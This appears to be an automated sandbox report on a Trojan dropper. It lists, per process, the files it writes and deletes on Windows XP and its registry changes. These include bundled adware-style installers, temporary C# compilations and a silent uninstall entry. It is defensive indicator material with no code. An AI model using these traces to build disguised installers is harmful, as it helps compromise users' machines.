The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\UIMQUZ37\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)

The process PSCustomSetupUtil.exe:3848 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\7RVY147B\Microsoft.PowerShell.Security.resources.dll (9 bytes)

The process regsvr32.exe:3056 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (0 bytes)

The process regsvr32.exe:2700 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\obuwa\obuwa.exe (259 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (26169 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\69.87.192[1].htm (17186 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (776 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\69.87.192[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\clicker\clicker.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\obuwa\obuwa.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (0 bytes)

The process summit_sharma.exe:2672 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\YouTube Downloader.msi (7337 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\disk1.cab (6081 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC (0 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install (0 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0 (0 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\YouTube Downloader.msi (0 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\holder0.aiph (0 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\disk1.cab (0 bytes)

The process 07-04-2016_hwopt_3.0.10-1.exe:1632 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-MB3U6.tmp\07-04-2016_hwopt_3.0.10-1.tmp (3844 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-MB3U6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-MB3U6.tmp\07-04-2016_hwopt_3.0.10-1.tmp (0 bytes)

The process InstallationStatsUploder_12052016001648.exe:2044 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.cmdline (426 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.0.cs (676 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.0.cs (0 bytes)

The process InstallationStatsUploder_12052016001648.exe:1488 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.0.cs (676 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.out (0 bytes)

The process InstallationStatsUploder_12052016001648.exe:580 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.0.cs (676 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.tmp (0 bytes)

The process InstallationStatsUploder_12052016001648.exe:1612 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.0.cs (676 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.tmp (0 bytes)

The process InstallationStatsUploder_12052016001648.exe:640 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.0.cs (676 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.tmp (0 bytes)

The process InstallationStatsUploder_12052016001648.exe:1848 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.cmdline (426 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.0.cs (676 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.err (0 bytes)

The process InstallationStatsUploder_12052016001648.exe:508 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.0.cs (676 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (591 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.dll (0 bytes)

The process InstallationStatsUploder_12052016001648.exe:1400 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%System%\config\system (4112 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.out (521 bytes)
%System%\config (672 bytes)
%System%\config\SYSTEM.LOG (8146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.0.cs (676 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.dll (0 bytes)

The process EditBinx86.exe:960 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\Utilsx86.dll (57 bytes)

The process EditBinx86.exe:2012 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\Utilsx86.dll (57 bytes)

The process mofcomp.exe:2684 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpEA.tmp (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpEA.tmp (0 bytes)

The process ngen.exe:332 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1218 bytes)

The process ngen.exe:276 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (544 bytes)

The process ngen.exe:2092 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1072 bytes)

The process ngen.exe:3300 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (752 bytes)

The process ngen.exe:2136 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1418 bytes)

The process ngen.exe:3212 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1152 bytes)

The process ngen.exe:2056 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1162 bytes)

The process ngen.exe:3340 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1074 bytes)

The process ngen.exe:2248 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1442 bytes)

The process ngen.exe:3160 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (714 bytes)

The process ngen.exe:2112 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (740 bytes)

The process ngen.exe:2240 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1108 bytes)

The process ngen.exe:3232 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1396 bytes)

The process ngen.exe:444 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (848 bytes)

The process ngen.exe:1496 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (596 bytes)

The process ngen.exe:2188 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (436 bytes)

The process ngen.exe:2212 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (768 bytes)

The process ngen.exe:2276 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (794 bytes)

The process ngen.exe:780 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1468 bytes)

The process ngen.exe:3224 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1454 bytes)

The process ngen.exe:2024 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (896 bytes)

The process ngen.exe:2160 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1082 bytes)

The process ngen.exe:2148 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (738 bytes)

The process cvtres.exe:308 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RESE.tmp (2936 bytes)

The process cvtres.exe:1968 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RES8.tmp (2936 bytes)

The process cvtres.exe:1556 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RESC.tmp (2936 bytes)

The process cvtres.exe:952 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RES6.tmp (2936 bytes)

The process cvtres.exe:1064 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\RES14.tmp (2892 bytes)

The process cvtres.exe:340 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RES12.tmp (2944 bytes)

The process cvtres.exe:164 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RES10.tmp (2940 bytes)

The process cvtres.exe:504 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RES4.tmp (2936 bytes)

The process cvtres.exe:364 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RESA.tmp (2936 bytes)

The process Osman_Navigation.exe:4072 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\setupapi.log (4240 bytes)
%Program Files%\FrivLauncher\FrivLauncher.exe (5054 bytes)
%Documents and Settings%\%current user%\Application Data\XBox\SETF8.tmp (44854 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp (4 bytes)
%Program Files%\FrivLauncher\uninst.exe (8693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\title.png (403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\topbg.png (1450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{01193C1E-21DF-4D50-8393-687E2938346B} (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\nsSkinEngine.dll (7767 bytes)
%Documents and Settings%\All Users\Desktop\FrivLauncher.lnk (730 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\XBLive.exe (191491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_feedback.png (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress_bg.png (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress.png (978 bytes)
%WinDir%\Temp\{CD2F8BB9-5758-4151-B5BB-E507B7C16422} (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_close.png (711 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\FrivLauncher\FrivLauncher.lnk (742 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\checkbox.png (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\DownloadInstall.dll (9043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\go184.7531c668845f402cb058ad10921a3520.zip (260891 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\Install.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\install.inf (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_big.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_small.png (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_min.png (237 bytes)
%Program Files%\FrivLauncher\FrivLauncher.exe.config (194 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\DownloadInstall.dll (0 bytes)
%Documents and Settings%\%current user%\Application Data\XBox\SETF8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\topbg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress_bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_close.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfF4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\go184.7531c668845f402cb058ad10921a3520.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_feedback.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\install.inf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\XBLive.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\Install.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_big.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_small.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_min.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\checkbox.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\nsSkinEngine.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\title.png (0 bytes)

The process PSSetupNativeUtils.exe:968 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)

The process fileman.exe:1636 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\WinDivert.dll (18 bytes)

The process mastermind.exe:3740 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@demo1.geniesoftsystem[1].txt (1081 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\get_installation_detail[1].htm (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\getip[1].htm (43 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (388 bytes)
%Documents and Settings%\%current user%\Application Data\master\Master.exe (83494 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\master\uninstaller.exe (1987 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\master\MasterReports.dll (15300 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nspF9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\Math.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\UserInfo.dll (0 bytes)

The process hwopt12052016001648.exe:912 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%System%\config (488 bytes)
%System%\config\system (7996 bytes)
%System%\config\SYSTEM.LOG (15882 bytes)

Registry activity

The process csc.exe:1992 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B 1F E7 ED 31 8D C9 F6 69 AE 57 1E BE DA 76 B6"

The process csc.exe:888 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 61 64 50 40 79 05 10 3D 09 84 64 7C 08 97 F0"

The process csc.exe:444 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 87 E0 36 3A E6 68 43 CE E6 F9 18 A2 CA C0 7B"

The process csc.exe:1532 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 87 17 28 8D 1F 3A 9D 3F 90 07 8E EF 70 B1 09"

The process csc.exe:544 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 3B 6A C9 A3 78 4B 96 06 A6 65 46 65 3A 91 F5"

The process csc.exe:2008 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 5E 46 39 2E 43 C0 3E 99 71 0C 33 2C 9C BE C1"

The process csc.exe:332 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 1E D1 1E 10 9A 45 C2 B0 1E BD E7 4A 8B C9 5C"

The process csc.exe:1752 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 8E 48 1E CA 74 C8 72 83 F7 24 0F 2E FD 00 36"

The process csc.exe:1512 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 22 F9 27 A7 C3 F3 60 04 14 0D 8A 19 69 55 FB"

The process 07-04-2016_hwopt_3.0.10-1.tmp:432 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\data]
"uninstaller_path" = "C:\Windows\hwopt_12052016001648"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"InstallLocation" = "C:\Windows\hwopt_12052016001648\"
"QuietUninstallString" = "C:\Windows\hwopt_12052016001648\unins000.exe /SILENT"
"DisplayVersion" = "3.0.10"

"Inno Setup: Icon Group" = "hwopt"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-U38O7.tmp]
"EditBinx86.exe" = "EditBin"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"MajorVersion" = "3"

"NoModify" = "1"

[HKLM\SOFTWARE]
"hwopt" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"UninstallString" = "C:\Windows\hwopt_12052016001648\unins000.exe"
"Inno Setup: User" = "%CurrentUserName%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"InstallDate" = "20160512"
"Publisher" = "hwopt"
"URLInfoAbout" = "http://genisys.online"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Windows\hwopt_12052016001648]
"InstallationStatsUploder_12052016001648.exe" = "InstallationStatsUploder"

